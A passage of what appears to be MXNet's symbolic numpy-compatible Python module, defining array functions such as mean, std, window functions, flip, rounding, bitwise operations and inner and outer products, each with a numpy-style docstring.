numpy when given float16 dtype and overflow happens - Does not support complex dtype - The dtypes of a and weights must be the same - Integral a results in float32 or float64 returned dtype, which depends on your current default dtype Examples -------- >>> data = np.arange(1, 5) >>> data array([1., 2., 3., 4.]) >>> np.average(data) array(2.5) >>> np.average(np.arange(1, 11), weights=np.arange(10, 0, -1)) array(4.) >>> data = np.arange(6).reshape((3,2)) >>> data array([[0., 1.], [2., 3.], [4., 5.]]) >>> weights = np.array([0.25, 0.75]) array([0.25, 0.75]) >>> np.average(data, axis=1, weights=weights) array([0.75, 2.75, 4.75]) """ if weights is None: return _npi.average(a, axis=axis, weights=None, returned=returned, weighted=False, out=out) else: return _npi.average(a, axis=axis, weights=weights, returned=returned, out=out) @set_module('mxnet.symbol.numpy') def mean(a, axis=None, dtype=None, out=None, keepdims=False): # pylint: disable=arguments-differ """ mean(a, axis=None, dtype=None, out=None, keepdims=None) Compute the arithmetic mean along the specified axis. Returns the average of the array elements. The average is taken over the flattened array by default, otherwise over the specified axis. Parameters ---------- a : `_Symbol` _Symbol containing numbers whose mean is desired. axis : None or int or tuple of ints, optional Axis or axes along which the means are computed. The default is to compute the mean of the flattened array. If this is a tuple of ints, a mean is performed over multiple axes, instead of a single axis or all the axes as before. dtype : data-type, optional Type to use in computing the mean. For integer inputs, When npx.is_np_default_dtype() returns False, default dtype is float32, When npx.is_np_default_dtype() returns True, default dtype is float64; for floating point inputs, it is the same as the input dtype. out : _Symbol, optional Dummy parameter to keep the consistency with the ndarray counterpart. keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. With this option, the result will broadcast correctly against the input array. If the default value is passed, then keepdims will not be passed through to the mean method of sub-classes of _Symbol, however any non-default value will be. If the sub-class method does not implement keepdims any exceptions will be raised. Returns ------- m : _Symbol, see dtype parameter above If out=None, returns a new array containing the mean values, otherwise a reference to the output array is returned. Notes ----- This function differs from the original `numpy.mean <https://docs.scipy.org/doc/numpy/reference/generated/numpy.mean.html>`_ in the following way(s): - only _Symbol is accepted as valid input, python iterables or scalar is not supported - default data type for integer input is float32 or float64, which depends on your current default dtype Examples -------- >>> a = np.array([[1, 2], [3, 4]]) >>> np.mean(a) array(2.5) >>> a = np.zeros((2, 512*512), dtype=np.float32) >>> a[0,:] = 1.0 >>> a[1,:] = 0.1 >>> np.mean(a) array(0.55) >>> np.mean(a, dtype=np.float64) array(0.55) """ return _npi.mean(a, axis=axis, dtype=dtype, keepdims=keepdims, out=out) @set_module('mxnet.symbol.numpy') def std(a, axis=None, dtype=None, out=None, ddof=0, keepdims=False): # pylint: disable=too-many-arguments """ Compute the standard deviation along the specified axis. Returns the standard deviation, a measure of the spread of a distribution, of the array elements. The standard deviation is computed for the flattened array by default, otherwise over the specified axis. Parameters ---------- a : `_Symbol` _Symbol containing numbers whose standard deviation is desired. axis : None or int or tuple of ints, optional Axis or axes along which the standard deviations are computed. The default is to compute the standard deviation of the flattened array. If this is a tuple of ints, computation is performed over multiple axes, instead of a single axis or all the axes as before. dtype : data-type, optional Type to use in computing the standard deviation. For integer inputs, the default is float32; for floating point inputs, it is the same as the input dtype. out : _Symbol, optional Dummy parameter to keep the consistency with the ndarray counterpart. keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. With this option, the result will broadcast correctly against the input array. If the default value is passed, then keepdims will not be passed through to the mean method of sub-classes of _Symbol, however any non-default value will be. If the sub-class method does not implement keepdims any exceptions will be raised. Returns ------- m : _Symbol, see dtype parameter above If out=None, returns a new array containing the standard deviation values, otherwise a reference to the output array is returned. Notes ----- This function differs from the original `numpy.std <https://docs.scipy.org/doc/numpy/reference/generated/numpy.mean.html>`_ in the following way(s): - only _Symbol is accepted as valid input, python iterables or scalar is not supported - default output data type for integer input is float32 """ return _npi.std(a, axis=axis, dtype=dtype, ddof=ddof, keepdims=keepdims, out=out) @set_module('mxnet.symbol.numpy') def var(a, axis=None, dtype=None, out=None, ddof=0, keepdims=False): # pylint: disable=too-many-arguments """ Compute the variance along the specified axis. Returns the variance of the array elements, a measure of the spread of a distribution. The variance is computed for the flattened array by default, otherwise over the specified axis. Parameters ---------- a : `_Symbol` _Symbol containing numbers whose variance is desired. axis : None or int or tuple of ints, optional Axis or axes along which the variance is computed. The default is to compute the variance of the flattened array. If this is a tuple of ints, computation is performed over multiple axes, instead of a single axis or all the axes as before. dtype : data-type, optional Type to use in computing the variance. For arrays of integer type, When npx.is_np_default_dtype() returns False, default dtype is float32, When npx.is_np_default_dtype() returns True, default dtype is float64; For arrays of float types it is the same as the array type. out : _Symbol, optional Dummy parameter to keep the consistency with the ndarray counterpart. keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. With this option, the result will broadcast correctly against the input array. If the default value is passed, then keepdims will not be passed through to the mean method of sub-classes of _Symbol, however any non-default value will be. If the sub-class method does not implement keepdims any exceptions will be raised. Returns ------- m : _Symbol, see dtype parameter above If out=None, returns a new array containing the variance values, otherwise a reference to the output array is returned. Notes ----- This function differs from the original `numpy.var <https://docs.scipy.org/doc/numpy/reference/generated/numpy.mean.html>`_ in the following way(s): - only _Symbol is accepted as valid input, python iterables or scalar is not supported - default output data type for integer input is float32 """ return _npi.var(a, axis=axis, dtype=dtype, ddof=ddof, keepdims=keepdims, out=out) # pylint: disable=redefined-outer-name @set_module('mxnet.symbol.numpy') def indices(dimensions, dtype=None, ctx=None): """Return an array representing the indices of a grid. Compute an array where the subarrays contain index values 0,1,... varying only along the corresponding axis. Parameters ---------- dimensions : sequence of ints The shape of the grid. dtype : data-type, optional The desired data-type for the array. Default is `int64`. ctx : device context, optional Device context on which the memory is allocated. Default is `mxnet.context.current_context()`. Returns ------- grid : _Symbol The array of grid indices, ``grid.shape = (len(dimensions),) + tuple(dimensions)``. Notes ----- The output shape is obtained by prepending the number of dimensions in front of the tuple of dimensions, i.e. if `dimensions` is a tuple ``(r0, ..., rN-1)`` of length ``N``, the output shape is ``(N,r0,...,rN-1)``. The subarrays ``grid[k]`` contains the N-D array of indices along the ``k-th`` axis. Explicitly:: grid[k,i0,i1,...,iN-1] = ik Examples -------- >>> grid = np.indices((2, 3)) >>> grid.shape (2, 2, 3) >>> grid[0] # row indices array([[0, 0, 0], [1, 1, 1]], dtype=int64) >>> grid[1] # column indices array([[0, 0, 0], [1, 1, 1]], dtype=int64) The indices can be used as an index into an array. >>> x = np.arange(20).reshape(5, 4) >>> row, col = np.indices((2, 3)) >>> x[row, col] array([[0., 1., 2.], [4., 5., 6.]]) Note that it would be more straightforward in the above example to extract the required elements directly with ``x[:2, :3]``. """ if isinstance(dimensions, (tuple, list)): if ctx is None: ctx = current_context() return _npi.indices(dimensions=dimensions, dtype=dtype, ctx=ctx) else: raise ValueError("The dimensions must be sequence of ints") # pylint: enable=redefined-outer-name @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def copysign(x1, x2, out=None, **kwargs): r""" Change the sign of x1 to that of x2, element-wise. If `x2` is a scalar, its sign will be copied to all elements of `x1`. Parameters ---------- x1 : _Symbol or scalar Values to change the sign of. x2 : _Symbol or scalar The sign of `x2` is copied to `x1`. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- out : _Symbol The values of `x1` with the sign of `x2`. This is a scalar if both `x1` and `x2` are scalars. Notes ------- This function differs from the original `numpy.copysign <https://docs.scipy.org/doc/numpy/reference/generated/numpy.copysign.html>`_ in the following aspects: - ``where`` param is not supported. """ return _ufunc_helper(x1, x2, _npi.copysign, _np.copysign, _npi.copysign_scalar, _npi.rcopysign_scalar, out) @set_module('mxnet.symbol.numpy') def ravel(x, order='C'): r""" ravel(x) Return a contiguous flattened array. A 1-D array, containing the elements of the input, is returned. A copy is made only if needed. Parameters ---------- x : _Symbol Input array. The elements in `x` are read in row-major, C-style order and packed as a 1-D array. order : `C`, optional Only support row-major, C-style order. Returns ------- y : _Symbol y is an array of the same subtype as `x`, with shape ``(x.size,)``. Note that matrices are special cased for backward compatibility, if `x` is a matrix, then y is a 1-D ndarray. Notes ----- This function differs from the original numpy.arange in the following aspects: - Only support row-major, C-style order. """ if order == 'F': raise NotImplementedError('order {} is not supported'.format(order)) if isinstance(x, numeric_types): return _np.reshape(x, -1) elif isinstance(x, _Symbol): return reshape(x, -1) else: raise TypeError('type {} not supported'.format(str(type(x)))) def unravel_index(indices, shape, order='C'): # pylint: disable=redefined-outer-name """ Converts a flat index or array of flat indices into a tuple of coordinate arrays. Parameters: ------------- indices : _Symbol An integer array whose elements are indices into the flattened version of an array of dimensions shape. Before version 1.6.0, this function accepted just one index value. shape : tuple of ints The shape of the array to use for unraveling indices. Returns: ------------- unraveled_coords : _Symbol Each row in the ndarray has the same shape as the indices array. Each column in the ndarray represents the unravelled index Examples: ------------- >>> np.unravel_index([22, 41, 37], (7,6)) ([3. 6. 6.] [4. 5. 1.]) >>> np.unravel_index(1621, (6,7,8,9)) (3, 1, 4, 1) """ if order == 'C': return _npi.unravel_index_fallback(indices, shape=shape) else: raise NotImplementedError('Don not support column-major (Fortran-style) order at this moment') def flatnonzero(a): r""" Return indices that are non-zero in the flattened version of a. This is equivalent to np.nonzero(np.ravel(a))[0]. Parameters ---------- a : _Symbol Input data. Returns ------- res : _Symbol Output array, containing the indices of the elements of `a.ravel()` that are non-zero. See Also -------- nonzero : Return the indices of the non-zero elements of the input array. ravel : Return a 1-D array containing the elements of the input array. """ out = _npi.nonzero(ravel(a)) return out.reshape(-1,) def diag_indices_from(arr): """ This returns a tuple of indices that can be used to access the main diagonal of an array a with a.ndim >= 2 dimensions and shape (n, n, ..., n). For a.ndim = 2 this is the usual diagonal, for a.ndim > 2 this is the set of indices to access a[i, i, ..., i] for i = [0..n-1]. Parameters: ------------- arr : _Symbol Input array for acessing the main diagonal. All dimensions should have equal length. Return: ------------- diag: _Symbol indices of the main diagonal. Examples: ------------- >>> a = np.arange(16).reshape(4, 4) >>> a array([[ 0, 1, 2, 3], [ 4, 5, 6, 7], [ 8, 9, 10, 11], [12, 13, 14, 15]]) >>> idx = np.diag_indices_from(a) >>> idx (array([0, 1, 2, 3]), array([0, 1, 2, 3])) >>> a[idx] = 100 >>> a array([[100, 1, 2, 3], [ 4, 100, 6, 7], [ 8, 9, 100, 11], [ 12, 13, 14, 100]]) """ return _npi.diag_indices_from(arr) @set_module('mxnet.symbol.numpy') def hanning(M, dtype=None, ctx=None): r"""Return the Hanning window. The Hanning window is a taper formed by using a weighted cosine. Parameters ---------- M : int Number of points in the output window. If zero or less, an empty array is returned. ctx : Context, optional An optional device context (default is the current default context). Returns ------- out : _Symbol, shape(M,) The window, with the maximum value normalized to one (the value one appears only if `M` is odd). When npx.is_np_default_dtype() returns False, default dtype is float32; When npx.is_np_default_dtype() returns True, default dtype is float64. Note that you need select numpy.float32 or float64 in this operator. See Also -------- blackman, hamming Notes ----- The Hanning window is defined as .. math:: w(n) = 0.5 - 0.5cos\left(\frac{2\pi{n}}{M-1}\right) \qquad 0 \leq n \leq M-1 The Hanning was named for Julius von Hann, an Austrian meteorologist. It is also known as the Cosine Bell. Some authors prefer that it be called a Hann window, to help avoid confusion with the very similar Hamming window. Most references to the Hanning window come from the signal processing literature, where it is used as one of many windowing functions for smoothing values. It is also known as an apodization (which means "removing the foot", i.e. smoothing discontinuities at the beginning and end of the sampled signal) or tapering function. References ---------- .. [1] Blackman, R.B. and Tukey, J.W., (1958) The measurement of power spectra, Dover Publications, New York. .. [2] E.R. Kanasewich, "Time Sequence Analysis in Geophysics", The University of Alberta Press, 1975, pp. 106-108. .. [3] Wikipedia, "Window function", http://en.wikipedia.org/wiki/Window_function .. [4] W.H. Press, B.P. Flannery, S.A. Teukolsky, and W.T. Vetterling, "Numerical Recipes", Cambridge University Press, 1986, page 425. Examples -------- >>> np.hanning(12) array([0. , 0.07937324, 0.29229254, 0.5711574 , 0.8274304 , 0.9797465 , 0.97974646, 0.82743025, 0.5711573 , 0.29229245, 0.07937312, 0. ]) Plot the window and its frequency response: >>> import matplotlib.pyplot as plt >>> window = np.hanning(51) >>> plt.plot(window.asnumpy()) [<matplotlib.lines.Line2D object at 0x...>] >>> plt.title("Hann window") Text(0.5, 1.0, 'Hann window') >>> plt.ylabel("Amplitude") Text(0, 0.5, 'Amplitude') >>> plt.xlabel("Sample") Text(0.5, 0, 'Sample') >>> plt.show() """ if ctx is None: ctx = current_context() return _npi.hanning(M, dtype=dtype, ctx=ctx) @set_module('mxnet.symbol.numpy') def hamming(M, dtype=None, ctx=None): r"""Return the hamming window. The hamming window is a taper formed by using a weighted cosine. Parameters ---------- M : int Number of points in the output window. If zero or less, an empty array is returned. ctx : Context, optional An optional device context (default is the current default context). Returns ------- out : _Symbol, shape(M,) The window, with the maximum value normalized to one (the value one appears only if `M` is odd). When npx.is_np_default_dtype() returns False, default dtype is float32; When npx.is_np_default_dtype() returns True, default dtype is float64. Note that you need select numpy.float32 or float64 in this operator. See Also -------- blackman, hanning Notes ----- The Hamming window is defined as .. math:: w(n) = 0.54 - 0.46cos\left(\frac{2\pi{n}}{M-1}\right) \qquad 0 \leq n \leq M-1 The Hamming was named for R. W. Hamming, an associate of J. W. Tukey and is described in Blackman and Tukey. It was recommended for smoothing the truncated autocovariance function in the time domain. Most references to the Hamming window come from the signal processing literature, where it is used as one of many windowing functions for smoothing values. It is also known as an apodization (which means "removing the foot", i.e. smoothing discontinuities at the beginning and end of the sampled signal) or tapering function. References ---------- .. [1] Blackman, R.B. and Tukey, J.W., (1958) The measurement of power spectra, Dover Publications, New York. .. [2] E.R. Kanasewich, "Time Sequence Analysis in Geophysics", The University of Alberta Press, 1975, pp. 109-110. .. [3] Wikipedia, "Window function", https://en.wikipedia.org/wiki/Window_function .. [4] W.H. Press, B.P. Flannery, S.A. Teukolsky, and W.T. Vetterling, "Numerical Recipes", Cambridge University Press, 1986, page 425. Examples -------- >>> np.hamming(12) array([0.08000001, 0.15302339, 0.34890914, 0.6054648 , 0.841236 , 0.9813669 , 0.9813668 , 0.8412359 , 0.6054647 , 0.34890908, 0.15302327, 0.08000001]) Plot the window and its frequency response: >>> import matplotlib.pyplot as plt >>> window = np.hamming(51) >>> plt.plot(window.asnumpy()) [<matplotlib.lines.Line2D object at 0x...>] >>> plt.title("hamming window") Text(0.5, 1.0, 'hamming window') >>> plt.ylabel("Amplitude") Text(0, 0.5, 'Amplitude') >>> plt.xlabel("Sample") Text(0.5, 0, 'Sample') >>> plt.show() """ if ctx is None: ctx = current_context() return _npi.hamming(M, dtype=dtype, ctx=ctx) @set_module('mxnet.symbol.numpy') def blackman(M, dtype=None, ctx=None): r"""Return the Blackman window. The Blackman window is a taper formed by using the first three terms of a summation of cosines. It was designed to have close to the minimal leakage possible. It is close to optimal, only slightly worse than a Kaiser window. Parameters ---------- M : int Number of points in the output window. If zero or less, an empty array is returned. ctx : Context, optional An optional device context (default is the current default context). Returns ------- out : _Symbol The window, with the maximum value normalized to one (the value one appears only if the number of samples is odd). When npx.is_np_default_dtype() returns False, default dtype is float32; When npx.is_np_default_dtype() returns True, default dtype is float64. Note that you need select numpy.float32 or float64 in this operator. See Also -------- hamming, hanning Notes ----- The Blackman window is defined as .. math:: w(n) = 0.42 - 0.5 \cos(2\pi n/{M-1}) + 0.08 \cos(4\pi n/{M-1}) Most references to the Blackman window come from the signal processing literature, where it is used as one of many windowing functions for smoothing values. It is also known as an apodization (which means "removing the foot", i.e. smoothing discontinuities at the beginning and end of the sampled signal) or tapering function. It is known as a "near optimal" tapering function, almost as good (by some measures) as the kaiser window. References ---------- Blackman, R.B. and Tukey, J.W., (1958) The measurement of power spectra, Dover Publications, New York. Oppenheim, A.V., and R.W. Schafer. Discrete-Time Signal Processing. Upper Saddle River, NJ: Prentice-Hall, 1999, pp. 468-471. Examples -------- >>> np.blackman(12) array([-1.4901161e-08, 3.2606423e-02, 1.5990365e-01, 4.1439798e-01, 7.3604530e-01, 9.6704686e-01, 9.6704674e-01, 7.3604506e-01, 4.1439781e-01, 1.5990359e-01, 3.2606363e-02, -1.4901161e-08]) Plot the window and its frequency response: >>> import matplotlib.pyplot as plt >>> window = np.blackman(51) >>> plt.plot(window.asnumpy()) [<matplotlib.lines.Line2D object at 0x...>] >>> plt.title("blackman window") Text(0.5, 1.0, 'blackman window') >>> plt.ylabel("Amplitude") Text(0, 0.5, 'Amplitude') >>> plt.xlabel("Sample") Text(0.5, 0, 'Sample') >>> plt.show() """ if ctx is None: ctx = current_context() return _npi.blackman(M, dtype=dtype, ctx=ctx) @set_module('mxnet.symbol.numpy') def flip(m, axis=None, out=None): r""" flip(m, axis=None, out=None) Reverse the order of elements in an array along the given axis. The shape of the array is preserved, but the elements are reordered. Parameters ---------- m : _Symbol or scalar Input array. axis : None or int or tuple of ints, optional Axis or axes along which to flip over. The default, axis=None, will flip over all of the axes of the input array. If axis is negative it counts from the last to the first axis. If axis is a tuple of ints, flipping is performed on all of the axes specified in the tuple. out : _Symbol or scalar, optional Alternative output array in which to place the result. It must have the same shape and type as the expected output. Returns ------- out : _Symbol or scalar A view of `m` with the entries of axis reversed. Since a view is returned, this operation is done in constant time. """ if isinstance(m, numeric_types): return _np.flip(m, axis) elif isinstance(m, _Symbol): return _npi.flip(m, axis, out=out) else: raise TypeError('type {} not supported'.format(str(type(m)))) @set_module('mxnet.symbol.numpy') def flipud(m): r""" flipud(*args, **kwargs) Flip array in the up/down direction. Flip the entries in each column in the up/down direction. Rows are preserved, but appear in a different order than before. Parameters ---------- m : array_like Input array. Returns ------- out : array_like A view of `m` with the rows reversed. Since a view is returned, this operation is :math:`\mathcal O(1)`. """ return flip(m, 0) @set_module('mxnet.symbol.numpy') def fliplr(m): r""" fliplr(*args, **kwargs) Flip array in the left/right direction. Flip the entries in each row in the left/right direction. Columns are preserved, but appear in a different order than before. Parameters ---------- m : array_like Input array, must be at least 2-D. Returns ------- f : ndarray A view of `m` with the columns reversed. Since a view is returned, this operation is :math:`\mathcal O(1)`. """ return flip(m, 1) @set_module('mxnet.symbol.numpy') def around(x, decimals=0, out=None, **kwargs): r""" around(x, decimals=0, out=None) Evenly round to the given number of decimals. Parameters ---------- x : _Symbol or scalar Input data. decimals : int, optional Number of decimal places to round to (default: 0). If decimals is negative, it specifies the number of positions to the left of the decimal point. out : _Symbol, optional Alternative output array in which to place the result. It must have the same shape and type as the expected output. Returns ------- rounded_array : _Symbol or scalar An array of the same type as `x`, containing the rounded values. A reference to the result is returned. Notes ----- For values exactly halfway between rounded decimal values, NumPy rounds to the nearest even value. Thus 1.5 and 2.5 round to 2.0, -0.5 and 0.5 round to 0.0, etc. This function differs from the original numpy.prod in the following aspects: - Cannot cast type automatically. Dtype of `out` must be same as the expected one. - Cannot support complex-valued number. """ if isinstance(x, numeric_types): return _np.around(x, decimals, **kwargs) elif isinstance(x, _Symbol): return _npi.around(x, decimals, out=out, **kwargs) else: raise TypeError('type {} not supported'.format(str(type(x)))) @set_module('mxnet.symbol.numpy') def round(x, decimals=0, out=None, **kwargs): r""" round(a, decimals=0, out=None) Round an array to the given number of decimals. See Also -------- around : equivalent function; see for details. """ if isinstance(x, numeric_types): return _np.around(x, decimals, **kwargs) elif isinstance(x, _Symbol): return _npi.around(x, decimals, out=out, **kwargs) else: raise TypeError('type {} not supported'.format(str(type(x)))) @set_module('mxnet.symbol.numpy') def round_(x, decimals=0, out=None, **kwargs): r""" round_(a, decimals=0, out=None) Round an array to the given number of decimals. See Also -------- around : equivalent function; see for details. """ if isinstance(x, numeric_types): return _np.around(x, decimals, **kwargs) elif isinstance(x, _Symbol): return _npi.around(x, decimals, out=out, **kwargs) else: raise TypeError('type {} not supported'.format(str(type(x)))) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def arctan2(x1, x2, out=None, **kwargs): r""" Element-wise arc tangent of ``x1/x2`` choosing the quadrant correctly. The quadrant (i.e., branch) is chosen so that ``arctan2(x1, x2)`` is the signed angle in radians between the ray ending at the origin and passing through the point (1,0), and the ray ending at the origin and passing through the point (`x2`, `x1`). (Note the role reversal: the "`y`-coordinate" is the first function parameter, the "`x`-coordinate" is the second.) By IEEE convention, this function is defined for `x2` = +/-0 and for either or both of `x1` and `x2` = +/-inf (see Notes for specific values). This function is not defined for complex-valued arguments; for the so-called argument of complex values, use `angle`. Parameters ---------- x1 : _Symbol or scalar `y`-coordinates. x2 : _Symbol or scalar `x`-coordinates. `x2` must be broadcastable to match the shape of `x1` or vice versa. out : _Symbol or None, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or `None`, a freshly-allocated array is returned. Returns ------- out : _Symbol or scalar Array of angles in radians, in the range ``[-pi, pi]``. This is a scalar if `x1` and `x2` are scalars. Notes ----- *arctan2* is identical to the `atan2` function of the underlying C library. The following special values are defined in the C standard: [1]_ ====== ====== ================ `x1` `x2` `arctan2(x1,x2)` ====== ====== ================ +/- 0 +0 +/- 0 +/- 0 -0 +/- pi > 0 +/-inf +0 / +pi < 0 +/-inf -0 / -pi +/-inf +inf +/- (pi/4) +/-inf -inf +/- (3*pi/4) ====== ====== ================ Note that +0 and -0 are distinct floating point numbers, as are +inf and -inf. This function differs from the original numpy.arange in the following aspects: - Only support float16, float32 and float64. References ---------- .. [1] ISO/IEC standard 9899:1999, "Programming language C." """ return _ufunc_helper(x1, x2, _npi.arctan2, _np.arctan2, _npi.arctan2_scalar, _npi.rarctan2_scalar, out=out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def hypot(x1, x2, out=None, **kwargs): r""" Given the "legs" of a right triangle, return its hypotenuse. Equivalent to ``sqrt(x1**2 + x2**2)``, element-wise. If `x1` or `x2` is scalar_like (i.e., unambiguously cast-able to a scalar type), it is broadcast for use with each element of the other argument. Parameters ---------- x1, x2 : _Symbol or scalar Leg of the triangle(s). out : _Symbol or None, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or `None`, a freshly-allocated array is returned. Returns ------- z : _Symbol or scalar The hypotenuse of the triangle(s). This is a scalar if both `x1` and `x2` are scalars. Notes ----- This function differs from the original numpy.arange in the following aspects: - Only support float16, float32 and float64. """ return _ufunc_helper(x1, x2, _npi.hypot, _np.hypot, _npi.hypot_scalar, None, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def bitwise_and(x1, x2, out=None, **kwargs): r""" Compute the bit-wise XOR of two arrays element-wise. Parameters ---------- x1, x2 : _Symbol or scalar Only integer and boolean types are handled. If x1.shape != x2.shape, they must be broadcastable to a common shape (which becomes the shape of the output). out : _Symbol or None, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or `None`, a freshly-allocated array is returned. Returns ------- out : _Symbol or scalar Result. """ return _ufunc_helper(x1, x2, _npi.bitwise_and, _np.bitwise_and, _npi.bitwise_and_scalar, None, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def bitwise_xor(x1, x2, out=None, **kwargs): r""" Compute the bit-wise XOR of two arrays element-wise. Parameters ---------- x1, x2 : _Symbol or scalar Only integer and boolean types are handled. If x1.shape != x2.shape, they must be broadcastable to a common shape (which becomes the shape of the output). out : _Symbol or None, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or `None`, a freshly-allocated array is returned. Returns ------- out : _Symbol or scalar Result. """ return _ufunc_helper(x1, x2, _npi.bitwise_xor, _np.bitwise_xor, _npi.bitwise_xor_scalar, None, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def bitwise_or(x1, x2, out=None, **kwargs): r""" Compute the bit-wise OR of two arrays element-wise. Parameters ---------- x1, x2 : _Symbol or scalar Only integer and boolean types are handled. If x1.shape != x2.shape, they must be broadcastable to a common shape (which becomes the shape of the output). out : _Symbol or None, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or `None`, a freshly-allocated array is returned. Returns ------- out : _Symbol or scalar Result. """ return _ufunc_helper(x1, x2, _npi.bitwise_or, _np.bitwise_or, _npi.bitwise_or_scalar, None, out) @set_module('mxnet.symbol.numpy') def unique(ar, return_index=False, return_inverse=False, return_counts=False, axis=None): """ Find the unique elements of an array. Returns the sorted unique elements of an array. There are three optional outputs in addition to the unique elements: * the indices of the input array that give the unique values * the indices of the unique array that reconstruct the input array * the number of times each unique value comes up in the input array Parameters ---------- ar : _Symbol Input array. Unless `axis` is specified, this will be flattened if it is not already 1-D. return_index : bool, optional If True, also return the indices of `ar` (along the specified axis, if provided, or in the flattened array) that result in the unique array. return_inverse : bool, optional If True, also return the indices of the unique array (for the specified axis, if provided) that can be used to reconstruct `ar`. return_counts : bool, optional If True, also return the number of times each unique item appears in `ar`. axis : int or None, optional The axis to operate on. If None, `ar` will be flattened. If an integer, the subarrays indexed by the given axis will be flattened and treated as the elements of a 1-D array with the dimension of the given axis, see the notes for more details. The default is None. Returns ------- unique : _Symbol The sorted unique values. unique_indices : _Symbol, optional The indices of the first occurrences of the unique values in the original array. Only provided if `return_index` is True. unique_inverse : _Symbol, optional The indices to reconstruct the original array from the unique array. Only provided if `return_inverse` is True. unique_counts : _Symbol, optional The number of times each of the unique values comes up in the original array. Only provided if `return_counts` is True. Notes ----- When an axis is specified the subarrays indexed by the axis are sorted. This is done by making the specified axis the first dimension of the array and then flattening the subarrays in C order. The flattened subarrays are then viewed as a structured type with each element given a label, with the effect that we end up with a 1-D array of structured types that can be treated in the same way as any other 1-D array. The result is that the flattened subarrays are sorted in lexicographic order starting with the first element. """ return _npi.unique(ar, return_index, return_inverse, return_counts, axis) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def ldexp(x1, x2, out=None, **kwargs): """ Returns x1 * 2**x2, element-wise. The mantissas `x1` and twos exponents `x2` are used to construct floating point numbers ``x1 * 2**x2``. Parameters ---------- x1 : _Symbol Array of multipliers. x2 : _Symbol Array of twos exponents. out : _Symbol or None Dummy parameter to keep the consistency with the ndarray counterpart. Returns ------- y : _Symbol The result of ``x1 * 2**x2``. Notes ----- Complex dtypes are not supported, they will raise a TypeError. Different from numpy, we allow x2 to be float besides int. `ldexp` is useful as the inverse of `frexp`, if used by itself it is more clear to simply use the expression ``x1 * 2**x2``. """ return _ufunc_helper(x1, x2, _npi.ldexp, _np.ldexp, _npi.ldexp_scalar, _npi.rldexp_scalar, out) @set_module('mxnet.symbol.numpy') def vdot(a, b): r""" Return the dot product of two vectors. Note that `vdot` handles multidimensional arrays differently than `dot`: it does *not* perform a matrix product, but flattens input arguments to 1-D vectors first. Consequently, it should only be used for vectors. Parameters ---------- a : _Symbol First argument to the dot product. b : _Symbol Second argument to the dot product. Returns ------- output : _Symbol Dot product of `a` and `b`. See Also -------- dot : Return the dot product without using the complex conjugate of the first argument. Examples -------- Note that higher-dimensional arrays are flattened! >>> a = np.array([[1, 4], [5, 6]]) >>> b = np.array([[4, 1], [2, 2]]) >>> np.vdot(a, b) 30 >>> np.vdot(b, a) 30 >>> 1*4 + 4*1 + 5*2 + 6*2 30 """ return tensordot(a.flatten(), b.flatten(), 1) @set_module('mxnet.symbol.numpy') def inner(a, b): r"""Inner product of two arrays. Ordinary inner product of vectors for 1-D arrays (without complex conjugation), in higher dimensions a sum product over the last axes. Parameters ---------- a, b : _Symbol If `a` and `b` are nonscalar, their last dimensions must match. Returns ------- out : _Symbol `out.shape = a.shape[:-1] + b.shape[:-1]` Raises ------ ValueError If the last dimension of `a` and `b` has different size. See Also -------- tensordot : Sum products over arbitrary axes. dot : Generalised matrix product, using second last dimension of `b`. einsum : Einstein summation convention. Notes ----- For vectors (1-D arrays) it computes the ordinary inner-product:: np.inner(a, b) = sum(a[:]*b[:]) More generally, if `ndim(a) = r > 0` and `ndim(b) = s > 0`:: np.inner(a, b) = np.tensordot(a, b, axes=(-1,-1)) or explicitly:: np.inner(a, b)[i0,...,ir-1,j0,...,js-1] = sum(a[i0,...,ir-1,:]*b[j0,...,js-1,:]) In addition `a` or `b` may be scalars, in which case:: np.inner(a,b) = a*b Examples -------- Ordinary inner product for vectors: >>> a = np.array([1,2,3]) >>> b = np.array([0,1,0]) >>> np.inner(a, b) 2 A multidimensional example: >>> a = np.arange(24).reshape((2,3,4)) >>> b = np.arange(4) >>> np.inner(a, b) array([[ 14, 38, 62], [ 86, 110, 134]]) """ return tensordot(a, b, [-1, -1]) @set_module('mxnet.symbol.numpy') def outer(a, b): r"""Compute the outer product of two vectors. Given two vectors, ``a = [a0, a1, ..., aM]`` and ``b = [b0, b1, ..., bN]``, the outer product [1]_ is:: [[a0*b0 a0*b1 ... a0*bN ] [a1*b0 . [ ... . [aM*b0 aM*bN ]] Parameters ---------- a : (M,) _Symbol First input vector. Input is flattened if not already 1-dimensional. b : (N,) _Symbol Second input vector. Input is flattened if not already 1-dimensional. Returns ------- out : (M, N) _Symbol ``out[i, j] = a[i] * b[j]`` See also -------- inner einsum : ``einsum('i,j->ij', a.ravel(), b.ravel())`` is the equivalent. ufunc.outer : A generalization to N dimensions and other operations. ``np.multiply.outer(a.ravel(), b.ravel())`` is the equivalent. References ---------- .. [1] : G. H. Golub and C. F. Van Loan, *Matrix Computations*, 3rd ed., Baltimore, MD, Johns Hopkins University Press, 1996, pg. 8. Examples -------- Make a (*very* coarse) grid for computing a Mandelbrot set: >>> rl = np.outer(np.ones((5,)), np.linspace(-2, 2, 5)) >>> rl array([[-2., -1., 0., 1., 2.], [-2., -1., 0., 1., 2.], [-2., -1., 0., 1., 2.], [-2., -1., 0., 1., 2.], [-2., -1., 0., 1., 2.]]) """ return tensordot(a.flatten(), b.flatten(), 0) @set_module('mxnet.symbol.numpy') def cross(a, b, axisa=-1, axisb=-1, axisc=-1, axis=None): # pylint: disable=too-many-arguments """ Return the cross product of two (arrays of) vectors. The cross product of `a` and `b` in :math:`R^3` is a vector perpendicular to both `a` and `b`. If `a` and `b` are arrays of vectors, the 